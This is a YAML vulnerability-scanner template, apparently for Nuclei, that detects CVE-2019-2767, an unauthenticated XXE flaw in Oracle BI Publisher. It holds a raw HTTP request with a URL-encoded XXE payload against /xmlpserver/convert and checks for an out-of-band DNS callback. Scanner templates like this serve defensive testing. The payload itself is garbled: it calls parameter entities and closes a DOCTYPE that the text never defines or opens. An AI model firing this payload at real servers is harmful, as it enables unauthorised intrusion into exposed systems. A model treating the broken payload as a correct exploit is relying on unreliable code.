id: CVE-2019-2767 info: name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob requests: - raw: - | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"